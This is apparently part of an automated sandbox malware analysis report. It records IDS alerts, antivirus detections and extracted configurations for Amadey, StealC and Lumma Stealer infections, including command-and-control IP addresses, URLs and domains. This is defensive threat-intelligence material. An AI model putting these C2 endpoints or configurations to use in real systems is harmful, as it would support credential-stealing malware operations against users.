2024-12-19T10:12:54.837899+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50207	172.67.177.88	443	TCP
2024-12-19T10:12:56.295805+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50205	172.67.179.109	443	TCP
2024-12-19T10:13:25.174032+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50268	104.21.66.85	443	TCP
2024-12-19T10:13:25.337700+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50267	172.67.177.88	443	TCP
2024-12-19T10:13:27.038266+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50269	172.67.179.109	443	TCP
2024-12-19T10:14:12.259688+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50349	104.21.66.85	443	TCP
2024-12-19T10:14:57.308094+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50396	172.67.180.113	443	TCP
2024-12-19T10:14:57.366688+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50395	104.21.23.76	443	TCP
2024-12-19T10:15:21.864915+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:57.647697+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50438	172.67.180.113	443	TCP
2024-12-19T10:16:27.580171+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	50453	104.21.64.80	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:30.112445+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:11:37.425638+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50096	185.215.113.206	80	TCP
2024-12-19T10:11:46.824975+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50132	185.215.113.206	80	TCP
2024-12-19T10:12:37.325490+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50195	185.215.113.206	80	TCP
2024-12-19T10:12:56.312916+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50255	185.215.113.206	80	TCP
2024-12-19T10:13:04.205795+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50263	185.215.113.206	80	TCP
2024-12-19T10:13:28.896173+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50312	185.215.113.206	80	TCP
2024-12-19T10:15:03.935747+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50416	185.215.113.206	80	TCP
2024-12-19T10:15:48.798638+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50441	185.215.113.206	80	TCP
2024-12-19T10:17:10.526107+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	50486	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:06.054314+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49846	185.215.113.43	80	TCP
2024-12-19T10:15:08.839521+0100	2856147	1	A Network Trojan was detected	192.168.2.6	50419	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:16.223487+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	49856	TCP
2024-12-19T10:12:31.390417+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	50189	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:10.760302+0100	2803305	3	Unknown Traffic	192.168.2.6	49860	185.215.113.16	80	TCP
2024-12-19T10:10:19.031784+0100	2803305	3	Unknown Traffic	192.168.2.6	49881	185.215.113.16	80	TCP
2024-12-19T10:10:30.109727+0100	2803305	3	Unknown Traffic	192.168.2.6	49910	185.215.113.16	80	TCP
2024-12-19T10:10:36.897957+0100	2803305	3	Unknown Traffic	192.168.2.6	49928	185.215.113.16	80	TCP
2024-12-19T10:10:45.184092+0100	2803305	3	Unknown Traffic	192.168.2.6	49974	31.41.244.11	80	TCP
2024-12-19T10:10:57.592219+0100	2803305	3	Unknown Traffic	192.168.2.6	50024	31.41.244.11	80	TCP
2024-12-19T10:11:08.716398+0100	2803305	3	Unknown Traffic	192.168.2.6	50049	31.41.244.11	80	TCP
2024-12-19T10:11:17.241351+0100	2803305	3	Unknown Traffic	192.168.2.6	50084	31.41.244.11	80	TCP
2024-12-19T10:11:30.160207+0100	2803305	3	Unknown Traffic	192.168.2.6	50091	31.41.244.11	80	TCP
2024-12-19T10:11:42.524542+0100	2803305	3	Unknown Traffic	192.168.2.6	50126	31.41.244.11	80	TCP
2024-12-19T10:11:47.964450+0100	2803305	3	Unknown Traffic	192.168.2.6	50135	31.41.244.11	80	TCP
2024-12-19T10:11:54.568248+0100	2803305	3	Unknown Traffic	192.168.2.6	50141	31.41.244.11	80	TCP
2024-12-19T10:12:01.294273+0100	2803305	3	Unknown Traffic	192.168.2.6	50147	31.41.244.11	80	TCP
2024-12-19T10:12:09.742377+0100	2803305	3	Unknown Traffic	192.168.2.6	50171	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:10:34.010895+0100	2803304	3	Unknown Traffic	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:11:03.537965+0100	2803304	3	Unknown Traffic	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:05.600674+0100	2803304	3	Unknown Traffic	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:07.114666+0100	2803304	3	Unknown Traffic	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:08.559564+0100	2803304	3	Unknown Traffic	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:17.171670+0100	2803304	3	Unknown Traffic	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:18.448881+0100	2803304	3	Unknown Traffic	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:24.362019+0100	2803304	3	Unknown Traffic	192.168.2.6	50087	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:12:29.940260+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50180	172.67.179.109	443	TCP
2024-12-19T10:12:38.614960+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50197	104.21.12.88	443	TCP
2024-12-19T10:13:28.498313+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50313	172.67.179.109	443	TCP
2024-12-19T10:13:41.782984+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50309	172.67.177.88	443	TCP
2024-12-19T10:14:28.820607+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50379	104.21.66.85	443	TCP
2024-12-19T10:14:36.040726+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50383	172.67.179.109	443	TCP
2024-12-19T10:15:14.212729+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50413	104.21.23.76	443	TCP
2024-12-19T10:15:21.864915+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:57.647697+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50438	172.67.180.113	443	TCP
2024-12-19T10:16:43.080676+0100	2843864	1	A Network Trojan was detected	192.168.2.6	50459	104.21.64.80	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "lossekniyyt.click", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "discokeyus.lat"], "Build id": "9Z1cyc--"}
Source: 6523f73121.exe.4132.9.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 59%			Perma Link
Source: file.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: rapeflowwj.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: crosshuaht.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: sustainskelet.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: aspecteirs.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: energyaffai.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: necklacebudi.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: discokeyus.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: grannyejh.lat
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: lossekniyyt.click
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: Workgroup: -
Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack	String decryptor: 9Z1cyc--

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Code function: 9_2_6D556C80 CryptQueryObject,CryptMsgGetParam,memset,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,memset,memset,CryptQueryObject,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,memset,GetLastError,memset,CryptBinaryToStringW,_wcsupr_s,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,

9_2_6D556C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:50137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.6:50144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:50148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.6:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.193.91:443 -> 192.168.2.6:50170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.6:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.6:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.12.88:443 -> 192.168.2.6:50251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.6:50256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:50260 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 6523f73121.exe, 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: nss3.pdb@ source: 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: nss3.pdb source: 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: mozglue.pdb source: 6523f73121.exe, 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmp

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 31MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 187MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49846 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:60512 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:56657 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49856
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49878 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49879 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:49206 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49908 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49904 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49909
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49916 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49909
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49909 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49927 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:57553 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49967 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49964 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49946 -> 172.67.179.109:443
